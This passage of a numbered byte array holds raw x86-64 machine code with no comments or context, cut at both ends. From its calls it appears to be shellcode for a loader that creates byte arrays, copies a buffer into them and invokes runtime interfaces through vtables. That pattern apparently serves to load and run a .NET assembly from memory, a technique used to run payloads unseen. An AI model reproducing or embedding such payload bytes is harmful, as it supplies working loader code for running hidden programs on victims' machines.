239 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48,
240 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b,
241 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54,
242 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00,
243 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
244 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
245 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02,
246 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
247 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b,
248 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
249 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
250 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48,
251 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
252 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
253 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
254 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b,
255 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff,
256 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8,
257 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0,
258 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b,
259 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00,
260 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10,
261 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
262 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
263 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc,
264 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10,
265 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
266 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0,
267 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0,
268 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb,
269 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
270 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20,
271 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48,
272 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19,
273 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48,
274 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39,
275 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
276 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
277 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a,
278 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
279 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7,
280 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b,
281 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48,
282 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b,
283 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b,
284 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00,
285 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b,
286 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2,
287 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
288 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45,
289 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
290 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
291 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00,
292 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
293 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
294 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18,
295 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00,
296 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
297 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
298 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
299 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
300 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
301 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00,
302 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00,
303 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28,
304 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
305 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95,
306 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff,
307 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
308 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
309 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b,
310 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
311 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff,
312 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
313 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
314 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b,
315 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0,
316 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
317 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8,
318 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d,
319 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0,
320 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0,
321 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00,
322 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01,
323 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
324 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
325 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
326 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00,
327 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00,
328 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0,
329 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
330 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41,
331 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00,
332 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
333 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
334 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
335 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2,
336 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48,
337 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2,
338 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45,
339 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff,
340 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b,
341 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b,
342 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30,
343 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
344 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
345 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
346 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
347 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48,
348 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00,
349 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89,
350 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8,
351 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00,
352 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00,
353 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b,
354 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01,
355 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
356 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48,
357 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00,
358 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55,
359 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55,
360 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85,
361 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85,
362 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00,
363 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
364 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38,
365 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
366 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00,
367 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00,
368 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
369 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
370 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
371 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00,
372 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00,
373 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00,
374 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
375 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
376 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x06, 0x00, 0x00,
377 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00,
378 0x48, 0x83, 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x1d, 0x02,
379 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40,
380 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
381 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x30, 0x48, 0x8b,
382 0x95, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x48, 0x8b, 0x95,
383 0xa0, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
384 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xbc, 0x01, 0x00,
385 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
386 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x04, 0x08, 0x00,
387 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xfa, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
388 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
389 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00,
390 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00,
391 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x83,
392 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xbb, 0x00, 0x00, 0x00,
393 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x97, 0x00, 0x00, 0x00,
394 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00,
395 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2, 0x48, 0x83, 0xc2, 0x04, 0x48,
396 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48, 0x8b, 0x95, 0xb0, 0x00, 0x00,
397 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x89, 0xd1, 0xff,
398 0xd0, 0x48, 0x89, 0x45, 0x78, 0x66, 0xc7, 0x45, 0x70, 0x08, 0x00, 0x48,
399 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00, 0x00,
400 0x00, 0x4c, 0x8d, 0x45, 0x70, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b, 0x8d,
401 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00,
402 0x83, 0xbd, 0xac, 0x00, 0x00, 0x00, 0x00, 0x79, 0x25, 0x48, 0x8b, 0x85,
403 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48,
404 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
405 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
406 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b, 0x85, 0xb0, 0x00,
407 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x39,
408 0xc2, 0x0f, 0x87, 0x51, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xac, 0x00, 0x00,
409 0x00, 0x00, 0x0f, 0x88, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
410 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
411 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
412 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55, 0xc0,
413 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55, 0x20,
414 0x48, 0x89, 0x55, 0xd0, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x4c,
415 0x8d, 0x45, 0x50, 0x4c, 0x89, 0x44, 0x24, 0x30, 0x4c, 0x8b, 0x85, 0xb8,
416 0x00, 0x00, 0x00, 0x4c, 0x89, 0x44, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0xc0,
417 0x4c, 0x89, 0x44, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41,
418 0xb8, 0x18, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
419 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48,
420 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
421 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
422 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb8,
423 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
424 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
425 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xa0, 0x00, 0x00, 0x00,
426 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81,
427 0xc4, 0x48, 0x01, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
428 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
429 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
430 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00,
431 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x30,
432 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
433 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
434 0x38, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
435 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
436 0x18, 0x48, 0x8b, 0x52, 0x38, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
437 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
438 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
439 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b,
440 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89,
441 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00,
442 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
443 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20,
444 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48,
445 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18,
446 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
447 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45,
448 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10,
449 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff,
450 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00,
451 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0,
452 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b,
453 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52,
454 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
455 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55,
456 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
457 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
458 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48,
459 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b,
460 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89,
461 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00,
462 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85,
463 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b,
464 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12,
465 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00,
466 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
467 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb,
468 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48,
